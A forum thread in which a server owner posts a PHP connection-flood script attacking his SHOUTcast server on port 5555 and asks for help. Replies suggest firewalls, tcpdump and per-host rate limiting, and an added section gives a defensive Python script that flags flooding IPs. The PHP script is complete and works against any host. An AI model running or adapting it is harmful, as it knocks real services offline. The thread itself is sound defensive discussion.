I need help

adamp

Someone is attacking my DA server with this code:

<?php

####################
$host = "250.250.250.250";
$port = "5555";
$times = 99999999999999999999999999999999999999999999999999999; # number of connections
$loop = 0; # (0/1) 1 = don't stop connecting, 0 = stop after `$times` connections.
####################

ini_set("max_execution_time",0);
ini_set("default_socket_timeout",0);

$sock = array();
$sc = 0;

$PrePacket = "GET / HTTP/1.0\r\n";
$PrePacket.= "Host: {$host}\r\n";
$PrePacket.= "User-Agent: WinampMPEG/5.30\r\n";
$PrePacket.= "Accept: */*\r\n";
$PrePacket.= "Icy-MetaData:1\r\n";
$PrePacket.= "Connection: close\r\n\r\n";

do {
for($i = 1; $i <= $times; $i++) {
$sock[$i] = @fsockopen($host, $port);
if($sock[$i]) {
$sc++;
echo "[~] {$sc}/{$i}\t\t\r";
$alive[$i] = 1;
fputs($sock[$i], $PrePacket);
if($sock[$i-1]) {
fclose($sock[$i-1]);
}
}
}
} while ($loop);
?>


Can someone help me with what I can do?
 
For a long-term solution you can try firewalling your system to close all unnecessary ports.
Which firewall software you use is dependent on your OS; for Linux you could try APF or KISS My Firewall:
http://www.directadmin.com/forum/showthread.php?t=14500
http://www.directadmin.com/forum/showthread.php?t=22587

Or for FreeBSD you could choose either IPFW or PF, although it seems there is not a guide for it on these forums; I always prefer PF:
http://www.directadmin.com/forum/showthread.php?t=10906
 
And how is firewalling going to stop a php file from executing?

Jeff

Why did you get the impression this script was running locally? Seeing $host = "250.250.250.250"; would indicate to me that this can be used to attack any remote IP.

Obviously the simplest way to stop local attacks is to watch who you give out access to.
 
> Why did you get the impression this script was running locally?

Maybe I am stupid, but if the script was being run remotely then how would he know what the code was? My impression is he found the script (probably in /tmp) and then looked at it and posted it.
 
> Why did you get the impression this script was running locally? Seeing $host = "250.250.250.250"; would indicate to me that this can be used to attack any remote IP.
>
> Obviously the simplest way to stop local attacks is to watch who you give out access to.

This script runs from another server,
and I need to use port 5555.
I don't want to close it.
 
> This script runs from another server,
> and I need to use port 5555.
> I don't want to close it.

Yeah... I thought as much.

To begin with I'd take a close look at tcpdump. It would be a good idea to find out how many attacking IPs you're dealing with, but seeing as you already know it's a PHP script doing the dirty work I'd guess that there aren't many. Out of interest, what software is the client running which is bound to port 5555?

tcpdump will hopefully give you some clues as to the attacking IPs, but in the meantime you could try rate limiting on a per-host basis via your software firewall, although this may hinder legit users.
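
An added example, not part of the original thread: one way to turn the tcpdump suggestion above into a list of candidate source IPs is to count new inbound connections (bare SYNs) to port 5555 per source and per second. It assumes the capture was taken with `tcpdump -nn -tt 'tcp dst port 5555'`; the function names, the 5-per-second threshold and the sample lines (documentation address ranges) are constructed for illustration.

```python
import re
from collections import Counter, defaultdict

# Matches IPv4 TCP lines from `tcpdump -nn -tt`, e.g.
# 1700000000.001000 IP 198.51.100.7.40001 > 203.0.113.10.5555: Flags [S], seq 1, ...
LINE_RE = re.compile(
    r"^(?P<ts>\d+)\.\d+ IP (?P<src>\d+\.\d+\.\d+\.\d+)\.\d+ > "
    r"\d+\.\d+\.\d+\.\d+\.(?P<dport>\d+): Flags \[(?P<flags>[^\]]+)\]"
)

def syn_stats(lines, port=5555):
    """Return {src_ip: (total_syns, peak_syns_in_one_second)} for `port`."""
    per_second = defaultdict(Counter)
    for line in lines:
        m = LINE_RE.match(line)
        # A bare SYN ("S") marks a new inbound connection attempt;
        # SYN-ACK ("S."), ACK (".") and data segments are ignored.
        if not m or int(m["dport"]) != port or m["flags"] != "S":
            continue
        per_second[m["src"]][int(m["ts"])] += 1
    return {ip: (sum(c.values()), max(c.values()))
            for ip, c in per_second.items()}

def flooders(lines, port=5555, max_per_second=5):
    """Sources whose peak new-connection rate exceeds the (assumed) threshold."""
    hits = [(ip, total, peak)
            for ip, (total, peak) in syn_stats(lines, port).items()
            if peak > max_per_second]
    return sorted(hits, key=lambda h: h[1], reverse=True)

def sample_capture():
    """Constructed capture: one flooding source, one ordinary listener."""
    fmt = ("{ts}.{us:06d} IP {src}.{sp} > 203.0.113.10.{dp}: "
           "Flags [{fl}], seq 1, win 64240, length 0")
    # 40 SYNs from one source within two seconds (20 per second)
    lines = [fmt.format(ts=1700000000 + i // 20, us=i * 1000,
                        src="198.51.100.7", sp=40000 + i, dp=5555, fl="S")
             for i in range(40)]
    # A listener: two connections seconds apart, an ACK, and unrelated port 80
    for ts, dp, fl in [(1700000000, 5555, "S"), (1700000000, 5555, "."),
                       (1700000003, 5555, "S"), (1700000004, 80, "S")]:
        lines.append(fmt.format(ts=ts, us=500000, src="192.0.2.44",
                                sp=51000, dp=dp, fl=fl))
    return lines

if __name__ == "__main__":
    for ip, total, peak in flooders(sample_capture()):
        print(f"{ip}: {total} SYNs, peak {peak}/s")
```

The peak per-second figure for ordinary clients on a real capture is a reasonable starting point for the per-host rate limit mentioned above, since it shows how tight the limit can be before it affects legitimate users.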
 
> Yeah... I thought as much.
>
> To begin with I'd take a close look at tcpdump. It would be a good idea to find out how many attacking IPs you're dealing with, but seeing as you already know it's a PHP script doing the dirty work I'd guess that there aren't many. Out of interest, what software is the client running which is bound to port 5555?
>
> tcpdump will hopefully give you some clues as to the attacking IPs, but in the meantime you could try rate limiting on a per-host basis via your software firewall, although this may hinder legit users.

SHOUTcast radio server
 